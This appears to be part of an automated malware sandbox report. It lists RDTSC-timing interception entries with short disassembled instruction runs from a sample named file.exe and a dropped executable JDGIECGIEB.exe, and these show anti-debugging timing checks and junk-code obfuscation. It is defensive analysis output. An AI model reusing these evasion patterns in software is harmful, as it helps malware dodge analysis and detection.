Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB840 second address: ABB865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jp 00007F4465131BE0h 0x0000000f jmp 00007F4465131BD4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB865 second address: ABB874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F44646ECA46h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA07 second address: ABBA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BCBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA16 second address: ABBA39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F44646ECA57h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA39 second address: ABBA56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA56 second address: ABBA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4977 second address: AC49A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD7h 0x00000007 ja 00007F4465131BC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4465131BCDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC49A5 second address: AC49BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB763 second address: ADB769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF16F3 second address: AF172A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F44646ECA58h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F44646ECA46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF172A second address: AF172E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF04BF second address: AF04C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF04C5 second address: AF04CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0ABE second address: AF0ACA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F44646ECA46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0ACA second address: AF0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DC2 second address: AF0DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F44646ECA4Ch 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnp 00007F44646ECA46h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DE3 second address: AF0DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DE9 second address: AF0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF105A second address: AF1060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF11CD second address: AF1203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F44646ECA57h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA53h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1203 second address: AF1207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1207 second address: AF120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF43F1 second address: AF441E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4465131BD9h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF441E second address: AF4428 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F44646ECA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5A2F second address: AF5A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5A37 second address: AF5A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5020A second address: 4B50231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4465131BD5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50231 second address: 4B5024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5024B second address: 4B5026E instructions: 0x00000000 rdtsc 0x00000002 mov bh, 52h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4465131BD2h 0x0000000b mov edx, ecx 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5026E second address: 4B50284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502D9 second address: 4B502E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502E5 second address: 4B502EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 04EAFDFAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502EF second address: 4B502F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50369 second address: 4B50378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50378 second address: 4B503B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 355B3BCAh 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e jmp 00007F4465131BCAh 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F4465131BCCh 0x0000001f sub cx, AAB8h 0x00000024 jmp 00007F4465131BCBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50475 second address: 4B5048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5048D second address: 4B50491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50491 second address: 4B504F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3A447016h 0x0000000f jmp 00007F44646ECA57h 0x00000014 call 00007F44D5110581h 0x00000019 push 755727D0h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [75600140h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e jmp 00007F44646ECA56h 0x00000063 and dword ptr [ebp-04h], 00000000h 0x00000067 jmp 00007F44646ECA50h 0x0000006c mov edx, dword ptr [ebp+0Ch] 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov ecx, ebx 0x00000074 pushad 0x00000075 popad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504F1 second address: 4B5052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4465131BCEh 0x00000012 xor cx, 1748h 0x00000017 jmp 00007F4465131BCBh 0x0000001c popfd 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5052F second address: 4B505DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA54h 0x00000009 popad 0x0000000a popad 0x0000000b mov al, byte ptr [edx] 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov edi, 29F7A23Eh 0x00000016 popad 0x00000017 inc edx 0x00000018 jmp 00007F44646ECA55h 0x0000001d test al, al 0x0000001f pushad 0x00000020 call 00007F44646ECA4Ch 0x00000025 pushfd 0x00000026 jmp 00007F44646ECA52h 0x0000002b jmp 00007F44646ECA55h 0x00000030 popfd 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007F44646ECA57h 0x0000003a adc ecx, 77AA925Eh 0x00000040 jmp 00007F44646ECA59h 0x00000045 popfd 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505DE second address: 4B505DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 21A28327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F4465131B21h 0x00000010 mov al, byte ptr [edx] 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 mov edi, 29F7A23Eh 0x0000001b popad 0x0000001c inc edx 0x0000001d jmp 00007F4465131BD5h 0x00000022 test al, al 0x00000024 pushad 0x00000025 call 00007F4465131BCCh 0x0000002a pushfd 0x0000002b jmp 00007F4465131BD2h 0x00000030 jmp 00007F4465131BD5h 0x00000035 popfd 0x00000036 pop esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushfd 0x0000003a jmp 00007F4465131BD7h 0x0000003f adc ecx, 77AA925Eh 0x00000045 jmp 00007F4465131BD9h 0x0000004a popfd 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50600 second address: 4B50604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50604 second address: 4B5060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5060A second address: 4B5064E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c jmp 00007F44646ECA4Eh 0x00000011 dec edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA57h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5064E second address: 4B506D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4465131BD2h 0x00000009 or cx, F578h 0x0000000e jmp 00007F4465131BCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea ebx, dword ptr [edi+01h] 0x0000001a jmp 00007F4465131BD6h 0x0000001f mov al, byte ptr [edi+01h] 0x00000022 pushad 0x00000023 mov bx, ax 0x00000026 push esi 0x00000027 mov dx, CD1Ch 0x0000002b pop edi 0x0000002c popad 0x0000002d inc edi 0x0000002e jmp 00007F4465131BD0h 0x00000033 test al, al 0x00000035 jmp 00007F4465131BD0h 0x0000003a jne 00007F44D5B49F83h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F4465131BCAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506D6 second address: 4B506E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506E5 second address: 4B506EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506EB second address: 4B506EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506EF second address: 4B50757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, edx 0x0000000d jmp 00007F4465131BD6h 0x00000012 shr ecx, 02h 0x00000015 pushad 0x00000016 jmp 00007F4465131BCEh 0x0000001b pushfd 0x0000001c jmp 00007F4465131BD2h 0x00000021 sub al, FFFFFF88h 0x00000024 jmp 00007F4465131BCBh 0x00000029 popfd 0x0000002a popad 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 rep movsd 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop esi 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50757 second address: 4B50774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50774 second address: 4B507B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a pushad 0x0000000b jmp 00007F4465131BD3h 0x00000010 jmp 00007F4465131BD8h 0x00000015 popad 0x00000016 and ecx, 03h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507B4 second address: 4B507B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507B8 second address: 4B507BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507BC second address: 4B507C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507C2 second address: 4B508B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4465131BCCh 0x00000013 sbb ah, 00000038h 0x00000016 jmp 00007F4465131BCBh 0x0000001b popfd 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F4465131BD6h 0x00000025 xor esi, 7FC66798h 0x0000002b jmp 00007F4465131BCBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000039 jmp 00007F4465131BD6h 0x0000003e mov eax, ebx 0x00000040 jmp 00007F4465131BD0h 0x00000045 mov ecx, dword ptr [ebp-10h] 0x00000048 pushad 0x00000049 push eax 0x0000004a mov cx, di 0x0000004d pop edx 0x0000004e popad 0x0000004f mov dword ptr fs:[00000000h], ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F4465131BCCh 0x0000005f jmp 00007F4465131BD5h 0x00000064 popfd 0x00000065 pushfd 0x00000066 jmp 00007F4465131BD0h 0x0000006b adc esi, 46DC7DE8h 0x00000071 jmp 00007F4465131BCBh 0x00000076 popfd 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508B1 second address: 4B508B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508B7 second address: 4B508BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508BB second address: 4B50909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov edx, 6C328D2Eh 0x00000010 mov ah, dl 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F44646ECA50h 0x00000019 sub cx, 1B78h 0x0000001e jmp 00007F44646ECA4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F44646ECA55h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50909 second address: 4B5093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4465131BD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5093B second address: 4B5094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5094A second address: 4B5097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4465131BCFh 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jmp 00007F4465131BD2h 0x00000013 leave 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov cl, 03h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5097A second address: 4B50475 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F44646ECA55h 0x0000000c adc esi, 4ECFC196h 0x00000012 jmp 00007F44646ECA51h 0x00000017 popfd 0x00000018 popad 0x00000019 retn 0008h 0x0000001c cmp dword ptr [ebp-2Ch], 10h 0x00000020 mov eax, dword ptr [ebp-40h] 0x00000023 jnc 00007F44646ECA45h 0x00000025 push eax 0x00000026 lea edx, dword ptr [ebp-00000590h] 0x0000002c push edx 0x0000002d call esi 0x0000002f push 00000008h 0x00000031 pushad 0x00000032 mov di, ax 0x00000035 push esi 0x00000036 pushfd 0x00000037 jmp 00007F44646ECA57h 0x0000003c adc eax, 0BF78E8Eh 0x00000042 jmp 00007F44646ECA59h 0x00000047 popfd 0x00000048 pop eax 0x00000049 popad 0x0000004a push 3B19AC12h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007F44646ECA59h 0x00000058 xor ecx, 2F5DB176h 0x0000005e jmp 00007F44646ECA51h 0x00000063 popfd 0x00000064 pushfd 0x00000065 jmp 00007F44646ECA50h 0x0000006a sub ah, FFFFFF98h 0x0000006d jmp 00007F44646ECA4Bh 0x00000072 popfd 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A6D second address: 4B50A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A74 second address: 4B50AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA52h 0x00000008 pushfd 0x00000009 jmp 00007F44646ECA52h 0x0000000e sbb cx, B7F8h 0x00000013 jmp 00007F44646ECA4Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e movsx edx, ax 0x00000021 mov eax, 4AFF3F27h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F44646ECA54h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50AD4 second address: 4B50AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331EC4 second address: 331EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331EC9 second address: 331ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED1 second address: 331ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED5 second address: 331ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED9 second address: 331F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA55h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F44646ECA46h 0x0000001d jmp 00007F44646ECA4Dh 0x00000022 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331F13 second address: 331F1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4465131BC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331F1F second address: 331F4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F44646ECA46h 0x00000009 jmp 00007F44646ECA53h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F44646ECA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 32053D second address: 320543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 330F62 second address: 330F67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
